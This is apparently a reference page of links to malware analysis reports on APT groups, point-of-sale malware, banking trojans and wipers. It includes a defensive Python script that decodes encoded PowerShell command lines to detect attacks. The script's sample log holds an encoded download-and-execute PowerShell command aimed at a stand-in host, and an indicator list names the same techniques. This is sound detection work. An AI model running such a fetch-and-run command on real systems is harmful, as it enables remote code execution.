Malware Analysis Reports for Malware Management

    Apr 2018 - Symantec - New Orangeworm attack group targets the healthcare sector in the U.S., Europe, and Asia

      Mar 2018 - FireEye - Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques

      Jan 2018 - MalPedia - Get reports and info on various malware families and their actors - MORE REPORTS

      Dec 2017 - RSA - THE SHADOWS OF GHOSTS INSIDE THE RESPONSE OF A UNIQUE CARBANAK INTRUSION

      Nov 2017 - Minerva Labs - Emotet goes more evasive

      Oct 2017 - FireEye - Significant FormBook Distribution Campaigns Impacting the U.S. and South Korea

      Oct 2017 - Talos - “Cyber Conflict” Decoy Document Used In Real Cyber Conflict - Latest APT28 attack

      Mar 2017 - Palo Alto - Pulling back the Curtains on EncodedCommand PowerShell Attacks

      Mar 2017 - Symantec - The increased use of PowerShell in Attacks

      Mar 2017 - Kaspersky - From Shamoon to StoneDrill

      Feb 2017 - Kaspersky - Fileless attacks against enterprise networks (A GREAT reason to do good logging; it would catch this)

      Aug 2016 - SecureWorks - Malware lingers with BITS

      Aug 2016 - Kaspersky - Project Sauron - Top level cyber-espionage platform covertly extracts encrypted government comms

      Mar 2016 - Fortinet - Dridex's New and Undiscovered Recipes

      Mar 2016 - SANS ISC - Analysis of the Cyber Attack on the Ukrainian Power Grid

      Feb 2016 - FireEye/Mandiant - M-Trends 2016 - Good overview of Mandiant Consulting findings in 2015

      Feb 2016 - TrendLabs - FighterPOS gets worm routine

      Feb 2016 - InfoSec Institute - PoS Malware: All you need to know - Good list of many of the PoS malware variants with details

      Jan 2016 - ZScaler - Malicious Office Files Dropping Kasidet and Dridex

      Jan 2016 - Arbor Networks Blog on Uncovering the Seven Pointed Dagger - Trochilus RAT

      Jan 2016 - EmsiSoft Blog on Ransom32, JavaScript cross-platform ransomware

      2015 - F-Secure repo of whitepapers on Advanced Malware (Regin, BlackEnergy, CozyDuke and many others)

      Dec 2015 - HackerHurricane - Dridex Analysis shows tricky shutdown and boot up persistence and how to detect and clean it

      Dec 2015 - Pro PoS, Threat Spotlight: Holiday Greetings from Pro PoS – Is your payment card data someone else’s Christmas present?

      Dec 2015 - Nemesis, Thriving Beyond The Operating System: Financial Threat Group Targets Volume Boot Record

      Nov 2015 - Destover, Toolset linked to Destover Attacker’s arsenal helps them to broaden attack surface

      Oct 2015 - iSight Partners ModPoS: MALWARE BEHAVIOR, CAPABILITIES AND COMMUNICATIONS

      Sept 2015 - Palo Alto Networks - Chinese actors use '3102' malware in attacks on US Government and EU media. Similar to the '9002' malware of 2014

      Sept 2015 - DrWeb finds MWZLesson POS Malware using parts of older malware

      • http://news.drweb.com/show/?i=9615&lng=en&c=5

      Sept 2015 - IBM Security Shifu Banking Malware attacking Japanese banks

      Aug 2015 - Arbor Networks Blog on Defending the White Elephant - PlugX

      Aug 2015 - Symantec - Regin: Top-tier espionage tool enables stealthy surveillance

      Aug 2015 - SecureWorks - Revealing the Cyber-Kraken - Multiple Verticals

      Aug 2015 - SecureWorks - Threat Group 3390 - Multiple verticals

      July 2015 - FireEye Hammertoss, Cyber Threat Group APT29

      June 2015 - Duqu 2.0 - Kaspersky Labs updates their research

      Feb 2015 - Carbanak - Kaspersky - The Great Bank Robbery

      Aug 2014 - Analysis of Dridex / Cridex / Feodo / Bugat
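The Palo Alto and Symantec entries above on EncodedCommand PowerShell attacks, together with the note that good logging would catch the Kaspersky fileless intrusions, describe a pattern that is easy to check for once process command lines are being logged. The following is an added example, not code from this page or from any vendor listed on it: it decodes the -EncodedCommand payload (base64 over UTF-16LE) from constructed 4688-style command lines and flags the ones that combine encoding with download-and-execute indicators. The indicator list, the sample command lines, the example.invalid URL and the function names are assumptions made for illustration.

```python
import base64
import binascii
import re

# PowerShell accepts any prefix of -EncodedCommand (-e, -en, -enc, -encoded ...) and the
# short form -ec, with "-" or "/" as the switch character. The payload is base64 over
# UTF-16LE text, so it must be decoded before any string match on the script can work.
_ENC_FLAG = re.compile(r"(?:^|\s)[-/](e[a-z]*)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Substrings that merit a look when they appear in a decoded script or next to an
# encoded payload on the outer command line. Illustrative list (an assumption), not a vendor's.
INDICATORS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
              "net.webclient", "frombase64string", "hidden", "bypass")


def find_encoded_argument(cmdline):
    """Return the base64 token following -EncodedCommand (or an abbreviation), else None."""
    for m in _ENC_FLAG.finditer(cmdline):
        flag = m.group(1).lower()
        if flag == "ec" or "encodedcommand".startswith(flag):
            return m.group(2)
        # -ExecutionPolicy, -ErrorAction, -Exec ... also start with "e": keep scanning
    return None


def decode_encoded_command(cmdline):
    """Decode the -EncodedCommand payload; None if absent, not base64, or not UTF-16LE."""
    b64 = find_encoded_argument(cmdline)
    if b64 is None:
        return None
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def assess(cmdline):
    """Classify one process command line as 'clear', 'suspicious' or 'undecodable'."""
    b64 = find_encoded_argument(cmdline)
    decoded = decode_encoded_command(cmdline)
    if b64 is not None and decoded is None:
        # Encoded switch present but the payload will not decode: worth a ticket on its own.
        return {"cmdline": cmdline, "decoded": None, "indicators": [], "status": "undecodable"}
    # Strip the base64 blob before matching so random base64 characters cannot trip an indicator.
    outer = cmdline if b64 is None else cmdline.replace(b64, "")
    text = outer.lower() + "\n" + (decoded or "").lower()
    hits = [i for i in INDICATORS if i in text]
    # Indicators beside an encoded payload are the pattern the reports describe; the same
    # words on a plain command line (-ExecutionPolicy Bypass -File ...) are usually admins.
    status = "suspicious" if (b64 is not None and hits) else "clear"
    return {"cmdline": cmdline, "decoded": decoded, "indicators": hits, "status": status}


def encode_for_powershell(script):
    """Produce the base64 form powershell.exe -EncodedCommand expects (UTF-16LE, no BOM)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines in the shape of the "Process Command Line" field of a
# Windows Security event 4688. Not real events; the download URL uses a reserved test domain.
MALICIOUS_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_LOG = [
    "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Enc " + encode_for_powershell(MALICIOUS_SCRIPT),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "powershell.exe -ec " + encode_for_powershell("Get-Service | Where-Object Status -eq 'Running'"),
    "powershell.exe -enc garbage",
]


def scan(lines):
    """Run assess() over every command line and return the results in order."""
    return [assess(line) for line in lines]


if __name__ == "__main__":
    for r in scan(SAMPLE_LOG):
        print(r["status"].upper(), r["cmdline"][:60])
        if r["decoded"]:
            print("   decoded:", r["decoded"])
        if r["indicators"]:
            print("   indicators:", ", ".join(r["indicators"]))
```

Run it against exported 4688 command lines (or Sysmon event 1 lines) rather than the constructed samples; the point of stripping the base64 blob before matching is that a long random-looking token will otherwise contain "iex" or "hidden" by chance often enough to drown the real hits.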

      Linux:  

      IptabLes/IptabLex (linux)

      • http://blog.malwaremustdie.org/2014/06/mmd-0025-2014-itw-infection-of-elf.html
      • http://storage.pardot.com/9892/121392/TA_DDos_Binary___Bot_IptabLes_v6_US.pdf

      MAC:

      OSXGetShell

      http://www.symantec.com/security_response/writeup.jsp?docid=2013-020412-3611-99&tabid=2

      WINDOWS:

      BackOff - Retail PoS

      https://www.us-cert.gov/ncas/alerts/TA14-212A
      http://blog.trendmicro.com/trendlabs-security-intelligence/new-pos-malware-backoff-targets-us/
      http://www.invincea.com/2014/09/analysis-of-backoff-pos-malware-gripping-the-retail-sector-reveals-lack-of-sophistication-in-malware/

      CryptoLocker - Crypto

      http://www.secureworks.com/cyber-threat-intelligence/threats/cryptolocker-ransomware

      https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/24000/PD24786/en_US/McAfee_Labs_Threat_Advisory_Ransom_Cryptolocker.pdf

      Chewbacca - Retail PoS

      https://blogs.rsa.com/rsa-uncovers-new-pos-malware-operation-stealing-payment-card-personal-information/

      Dexter/Project Hook - Retail PoS

      http://www.arbornetworks.com/asert/wp-content/uploads/2013/12/Dexter-and-Project-Hook-Break-the-Bank.pdf

      BlackPoS/Kaptoxa - Retail PoS

      http://www.securitycurrent.com/resources/files/KAPTOXA-Point-of-Sale-Compromise.pdf (iSight Partners)

      http://blogs.mcafee.com/mcafee-labs/analyzing-the-target-point-of-sale-malware

      https://kc.mcafee.com/resources/sites/MCAFEE/content/live/PRODUCT_DOCUMENTATION/24000/PD24927/en_US/McAfee_Labs_Threat_Advisory_EPOS_Data_Theft.pdf

      http://securityintelligence.com/target-data-breach-kaptoxa-pos-malware/

      Red October

      http://securelist.com/analysis/publications/36740/red-october-diplomatic-cyber-attacksinvestigation/

      http://securelist.com/analysis/36830/red-october-detailed-malware-description-1-first-stage-of-attack/

      SysPrep/Cryptbase.dll Priv Escalation

      http://www.symantec.com/security_response/earthlink_writeup.jsp?docid=2014-050812-0239-99

      The Snake/ Uroburos

      http://info.baesystemsdetica.com/rs/baesystems/images/snake_whitepaper.pdf
      http://www.viruslist.com/sp/analysis?pubid=207271262

      WinNTI (Discovered by us in June 2012 using this methodology)

      http://securelist.com/analysis/internal-threats-reports/37029/winnti-more-than-just-a-game/

      Mandiant APT1

      http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf

      Shady Rat

      http://www.symantec.com/connect/blogs/truth-behind-shady-rat

      Duqu

      http://www.kaspersky.com/about/press/major_malware_outbreaks/duqu
      http://www.secureworks.com/cyber-threat-intelligence/threats/duqu/
      http://www.symantec.com/outbreak/?id=stuxnet

      Stuxnet

      http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_stuxnet_dossier.pdf

      http://www.codeproject.com/Articles/246545/Stuxnet-Malware-Analysis-Paper

      http://www.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf

      https://www.mandiant.com/blog/stuxnet-memory-analysis-ioc-creation/

      Gameover Zeus

      http://www.secureworks.com/cyber-threat-intelligence/threats/The_Lifecycle_of_Peer_to_Peer_Gameover_ZeuS/

      Zeus/SpyEye

      http://www.ioactive.com/pdfs/ZeusSpyEyeBankingTrojanAnalysis.pdf

      Gauss

      http://securelist.com/analysis/36620/gauss-abnormal-distribution/

      Mini-Flame

      http://securelist.com/blog/virus-watch/31730/miniflame-aka-spe-elvis-and-his-friends-5/

      SkyWiper/Flame

      http://securelist.com/blog/incidents/34216/full-analysis-of-flames-command-control-servers-27/

      http://www.academia.edu/2394954/Flame_Malware_Analysis

      http://securelist.com/blog/incidents/33002/flame-replication-via-windows-update-mitm-proxy-server-18/

      http://www.crysys.hu/skywiper/skywiper.pdf

      ZeroAccess

      http://nakedsecurity.sophos.com/zeroaccess2/

      http://www.symantec.com/security_response/writeup.jsp?docid=2011-071314-0410-99&tabid=2

      Shamoon

      http://securelist.com/blog/incidents/57854/shamoon-the-wiper-copycats-at-work/

      http://securelist.com/blog/incidents/57784/shamoon-the-wiper-further-details-part-ii/

      Wiper

      http://www.secureworks.com/cyber-threat-intelligence/threats/wiper-malware-analysis-attacking-korean-financial-sector/